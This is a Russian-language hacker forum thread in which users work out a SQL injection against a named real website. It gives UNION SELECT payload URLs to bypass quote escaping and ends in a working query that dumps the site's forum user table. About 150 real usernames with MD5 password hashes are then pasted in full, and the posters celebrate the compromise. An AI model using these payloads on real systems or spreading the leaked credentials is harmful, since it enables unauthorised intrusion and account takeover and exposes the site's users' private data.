Интересует вопрос каким образом можно обойти фильтрацию кроме char в mysql. имеется сайт при запросе ...?root=2' фильтрует кавычку и пережд ней ставит слэш. каким образом возможно это обойти?

Никаким.

ХМ , только одни кавычки фильтрует???:D

все кавычки... просто если взять root=1=union+select+1,2,3,4,5,6,7,8/* тогда таблы подбираются и сообщение об ошибке уходит. но в поле ни где не отображает символов. Тобишь куда команды воодить :p пытался кавычку влепить и все... :confused:

а root=-1+union+select+1,2,3,4,5,6,7,8/* не пробовал?
на крайняк root=1+and+1=0+union+select+1,2,3,4,5,6,7,8/*

>> на крайняк root=1+and+1=0+union+select+1,2,3,4,5,6,7,8/*
Что значит на крайняк? :d

а root=-1+union+select+1,2,3,4,5,6,7,8/* не пробовал?
на крайняк root=1+and+1=0+union+select+1,2,3,4,5,6,7,8/*
я так понял он спрашивает не как запрос составить, а как обойти фильтрацию кавычки.

вообще код кавычки вроде %22 или %27
попробуй)

>> вообще код кавычки вроде %22 или %27
попробуй)

Хватит пороть херню. magic_quotes_gpc вы не обойдёте.

Зачем тебе при вводе команд кавычка?

Зачем тебе при вводе команд кавычка?
понты. круто :D :D :D

судя по четвертому посту значение переменной не обрамляется ковычками => пост Ламоза

какой то сайтег хитрожопый....
root=-1+union+select+1,2,3,4,5,6,7,8/* пробовал... он отображает коррекно главную страницу. но не показывает поля в которые вводить команды version() (в чем проблема?) и т.д. + не /* а -- вводить нужно. в первом случае отображает ошибку. root=1+and+1=0+union+select+1,2,3,4,5,6,7,8 -- так же отображает корректно.
%27 он заменяет на кавычку и опять такая трабла.

Думается мне что скуль слепая. Может выложишь нормальную ссылку на сайт?

PS /Ушёл спать, так что пусть другие напишут что то типа or ascii(substring(blablabla))) ...

http://www.bastaone.com./?root=99999+union+select+1,2,3,4,5,6,7,8 --

http://www.bastaone.com/?root=99999%2B

http://www.bastaone.com./?root=99999/**/union/**/select/**/1,2,3,version(),5,6,7,8--

o_O у тебя на этих ссылках отображает версию? http://www.bastaone.com./?root=99999/**/union/**/select/**/1,2,3,version(),5,6,7,8-- опять корректно отображенная страница без версии базы. че за х ваще? объясните почему так. или дайте ссылко на объяснение...

Не там копали хех -)

http://www.bastaone.com/?root=5&page=64+union+select+1,2,3,4,version(),6,user(),8, 9,10,11,12,13,14,15--&inner=1

-) Бедный бастер фанаты замучают....

http://www.bastaone.com/?root=5&page=64+union+select+1,2,3,4,5,6,concat(username,c har(58),user_password),8,9,10,11,12,13,14,15+from+ forum_users--&inner=1
5 admin:730e422673f0105793eede5fb1c42b65
5 Алексей:3ca7105fa471cc89f7b336899ca30a2e
5 Jozz:4fc5cdb7b63f4a7512176841dcebca19
5 ckavaRODka:0d6ef8847a7380f80b78aff6425e64ea
5 Destini:c68f1a64b81f32be5fd83587de848e89
5 DVORIK:a00d7b5a8aefdb8cbe1c402a60273a0d
5 Sky:faf74f937c6dfdfea81da7ee6d0bbb8d
5 Юлька:ccddbfffda0c16fb9f68149cfbccad88
5 Vov4ik:89d68f9f4ab5a9c568593d20f927af76
5 лариса:e48ebf3189177fd7b511d3cec6408ec6
5 Жига:6d071901727aec1ba6d8e2497ef5b709
5 Zoe4ka:61d0e9df67bfa8832c7e7d0d63792e7d
5 KaMaCyTpa:f80ef83da6197bc1c46a834dd8c26c4f
5 velik:060ba65dc14587c139d9dcb60d9a44d9
5 Катёна:54e93f09e95283f79e35124f829ca9de
5 Митяй:6104df369888589d6dbea304b59a32d4
5 SnuchyBuchy:c457d7ae48d08a6b84bc0b1b9bd7d474
5 Noone:f97b8dcbe052c13074c2f2a952277fc5
5 Анкин:6b10adae7e328e8b365550fc2f61227c
5 ulya:af4bc53b7545caaf2f34c4e90d34b4fc
5 basta:f80bf05527157a8c2a7bb63b22f49aaa
5 НОГАНО:158f3069a435b314a80bdcb024f8e422
5 Эда:92706ba4fd3022cede6d1610b17a0d2d
5 L.Vi:e660e68e771872fb2f05378ccaea2b6e
5 Гутлина:1d3cca3e378f43a9bccab79af121808c
5 Ghetto Super Star:1330740effe2ee52774aaf0decf328ae
5 SALOVA!:ab685911615418f8633cd73384646b52
5 AliSe:fa61f827f0f5373133b11cc20d835a79
5 IVa:5c506814bace1300aa77ff4cd6b73b0a
5 fuck you spilberg:2e3a80da10aacc02cf495208a3268a1c
5 Alex:03c5755cbc0e8c0481f7f25f33efa113
5 A.NA:4297f44b13955235245b2497399d7a93
5 sterva:af3406cdd87e3cf66ece71fbad522d82
5 suchok:fb9b7b827badf920d746c82f3a0cbf23
5 $ever:08c8caf8dce28055d29b8bc9dbd5ad2a
5 Алина:388ec3e3fa4983032b4f3e7d8fcb65ad
5 TERMINATOR:7110ec4a2c82816df161aca711a057db
5 Чипа:7db03a453663db95803b9542966ffee6
5 LYolYa:723fb8d47eb2b14b675ed9346b0381fb
5 #ДрЯнЬ#:030c7f5a22216d6fc78e83e00f51fe5a
5 JENNIFER:8e5aefd53a9d64a279d555cb1ba13a13
5 ResPecT ME:a1db7fa4bb743987087e70a0f5a621c3
5 Volchik:9a807e5eca3ae82014f0476dabe05283
5 Strela:6009c24687d89ad0702c6c7735c251c7
5 ella:fcea920f7412b5da7be0cf42b8c93759
5 Юленька:4ca4f434da0ea97ebff27833d69728d3
5 Варлам:8613985ec49eb8f757ae6439e879bb2a
5 Kamy:48042b1dae4950fef2bd2aafa0b971a1
5 КатЮсьКА:ed394d409df8071a35233f873f07ba4c
5 Giorgio:294aacb96e50108fb1787bd4528835d3
5 M.S.Dodge:dcddb75469b4b4875094e14561e573d8
5 Fiory:e7a251c82efaf1e0ee7fde495c66a82d
5 Vinch:66916250ae22e75dd17bd10a5d5f677e
5 U$@@LE:a70c5250627f21285dbde3a99376bb58
5 viva-LA-DIva:e8856cf8f5792f5b4a76afded716c2f2
5 Suzanna:beb6b72231daafe7d913baa818a63f0c
5 ika:c0cdd82ce092b01267bdd88a8bfbb1f4
5 Basyk:76419c58730d9f35de7ac538c2fd6737
5 ~Упавшая С Небес~:b0206347594d5ce170c77067364ddaf0
5 Luxor:4843f31e89d46f78f0e2dd50d4d9ee25
5 Бонита-21 Москва:17ed7aba0499d75a5194600b6cd7defe
5 virus11:1b36ea1c9b7a1c3ad668b8bb5df7963f
5 ~ nexm ~:f9b49c25ad05874058c4be423d36a997
5 luu:424714cebb144b266bb0b31d5b88dbd9
5 Валентина:86badf9077d7c1f28640969414b3950 5
5 ar4IK:ca172848cbc21794bac4f7ba9333fa5f
5 NiGGa:9078467720e4c507cddf535d1622b16a
5 tomusya:6530b306e711eed33930984698b492da
5 Nosfi:ac19f3852a283af00a9ef61c69f43458
5 hulk:e9561703e5678dbcab918a834c78dfab
5 Andramaha:8945b4cb1bfb8cb5c95c137fc60ed9a0
5 Allegra:f1fdec0e3ad78b4cf66259c0e17128f5
5 Natasha:c43f4d8386daed4c58d94d9b2a42449c
5 Андрей:cc8e65d0394b48741c3fb03dd4944b5a
5 G-SHOCK:2b313e5feca398c7b78a48b98edfeb91
5 DREAM:1037c96b43f134cbe671cc74321c7214
5 PlayBoy69:5fd105f14f44de91cd96bd84588da898
5 ростовский BOY:ce91813b482cf3a49b35f59f1a7c25a9
5 RossitA:241a0bbdb329b6862263e0a19c656b29
5 Princes:b4ebf85a118e392830a9552b0954a5bb
5 Lerone:c732df76cc30358d877b204bbd9e73e4
5 kama:0a3f12916c24e0911233b799243e221a
5 *@ntilop@*:011af761281cb5277da9dba275703960
5 Михаил:06a99069624190873c962b3e7b230cd6
5 ice-girl:060f63591e1ba28d19f5687396f7a2f1
5 kaban125:8cf18079bbefc2660e1f37f4a9100b0e
5 sitylad:4c7b2eab6d2f752c0180882083a200a1
5 Lvizza:9be3ba23545dbbda6d7459f844fd666c
5 VELVET:82e3409e4d94b9db847e62c45d4534cd
5 ДжЕм:bd12ac0bfe1eab7a475343f317d9f5eb
5 Баба Катя:df321578b4f5f132345d2e6b39743126
5 Бамбуччка:96055f5b06bf9381ac43879351642cf 5
5 MK:91db1309c8c8d38dca977c27644912b9
5 Sk1pp:4ba29b9f9e5732ed33761840f4ba6c53
5 asy:bbca7418b856051882de30cbb8ce3c09
5 DREAM-Girl!!!:))))):25df6ce392acc7c5e4e66925f428e7bb
5 Nexus:eaab6f7ff8c29ca90220d8ae6a09edb7
5 poker:ebf5f51b0775df54e87ddea074e7ae88
5 alexey-r:e5313e2ea3c7200e2764a316da88d25b
5 lacoste_white:f285bf9f80fca5b15baea117631339f8
5 Carmen:5b9b17459081ced81feecc9918304d97
5 Emptyfruit:402ea6dea3fc390ef7e931997d558ce8
5 i love you:4d2775def483f7ccd974e2b0402d5a24
5 Igor K.:9ef7676e4cde65a7e11d1856140ea7c4
5 splash:c5d860297ec1ec34004a0c751c3c6645
5 Ангелина:6ed48a86da35561c1aff5e1d862f24ea
5 Sn1f:b5db3cc74cb951925103562eb054cbe3
5 CanDy:a0f588a9df0e0fef670a4d6a6705380a
5 Darth Fader:788783fab296aac49dfdd4db3fd4b54f
5 Alinka:fbaefb2772f374ce1c8b4c4181a5a6dc
5 Марина:0b617a90e7b9689f9e513140ae3ccf59
5 Я та...:30e26659b71d435757b6a3cd4b0d4b38
5 kpbIMka:ee684688acbea58a2f5b0e9dee342dea
5 PaNs:75b9421e54f1b4eddc717730e93eb4b1
5 Дмитрий:46f94c8de14fb36680850768ff1b7f2a
5 M.T.I:32ac297dc14e134dc92109e880a25aaa
5 Катюшка_61:bc2c34556fc4a782124fdf35c1663ffb
5 ДашуNя:e9e6d1ae35817e860080f894d3844a92
5 жорик:aa3ba9de689c6a61c010166624c60eae
5 Helen:43677f48e4130d14717bf8b9066132fa
5 Наська:dc513ea4fbdaa7a14786ffdebc4ef64e
5 White-T:f5feb822f64b9e86ed424c39e67d39bd
5 Диман:229b09a38fbc43bfc51f5b33f3d7dce3
5 Luca:55fadfd036b568d4b2d5796ee444caa0
5 KATE:65cba7f50e8edfce77e30729eedf5ed5
5 Zloy:999817efdae8c2db95fbc6e27f5cee6e
5 AKILO:52c69e3a57331081823331c4e69d3f2e
5 Олеся:55c69f122cfa36ada103a654692c02d8
5 girl_4_love:3172d1796f26a25ee4075c910bf06c71
5 Екатерина:302285a2529c7059f225a3564c77270 1
5 Blocker:96e79218965eb72c92a549dd5a330112
5 Rey619:ff75efb9689d48c540f868f92aaab0bb
5 Bit:b5807eca845b9cc321d3fb0cfa3ae528
5 BRONX:1ccaeb5ead7346339145ac87018c784d
5 Revinho:a2550eeab0724a691192ca13982e6ebd
5 blackXS:48741484bee55181956ea5cdd04c6fdf
5 Ritka:071481cec96947f1c4d15ff93ddc0ae7
5 Trisha:8659f9810548e98d56d891e1f011b3a5
5 FastLife:4de38b0cfc90c7eb6a9d1d4f10063ff6
5 28:776c7dc9245377ecee01b36122cfe0bd
5 Кристя:25d55ad283aa400af464c76d713c07ad
5 Tonnique:243f6d66d577e4259a4da0529c41fac1
5 ВиЛ:1d01a43f14c1483e428856f4c0133314
5 CactuS-2k:25d55ad283aa400af464c76d713c07ad
5 Din-Din1993:f6dcdb7f097ab663f0f8971e2c3e33df
5 chilom:9475b0a31db2d7fe66e6e426a40b3213
5 Keikko:b89dc80fb627dbdcfe7d8e03876985d8
5 YouRun:467b617fec4d9fcb63505734ee224851
5 kill:0f44670608731b2abb4e192b7e6796e2
5 Стас:cd149777eb2f0c99f76692c7ca77f44f
5 MiSSS_NeGaTiFFF:abeac23c42193c5a3602a932e8dcb5e6
5 rino26:bd962670038a436c775c955f059f898f
5 Ольга:aee0bbbfdc1a12efde9727c6b488dcc9

хм... ясно. Но вопрос. почему так и что за параметр inner=1. Дайте ссылку на источник или объясните пожалуйста что это и когда используется?

Да ниче он не значит ты введи в адрессной строке:
http://www.bastaone.com/?root=5&page=64+union+sele%27ct+1,2,3,4,5,6,concat(usernam e,ch%27ar(58),user_password),8,9,10,11,12,13,14,15 +from+forum_users--
Тебе тоже самое выдаст. Я вообще не знаю для чего его здесь влепили. Этот параметр (переменная) нужен самому серваку, а точнее PHP-скрипту для выдачи определенного текста или страницы.
Допустим есть PHP-скрипт index.php с кодом:
<?php
if ($_GET['inner']==1)
echo "inner=1";
else echo "inner не равно 1";
?>
В этом коде, если inner в адресной строке равен единице, то скрипт выдаст "inner=1", а если же inner будет равен другому значению то, соответственно, скрипт выдаст "inner не равно 1" :)
Надеюсь доходчиво объяснил...

Все. Поянл. Спасибо за помощь. ))) Бедный сайт басты... ;( ему ж ппц...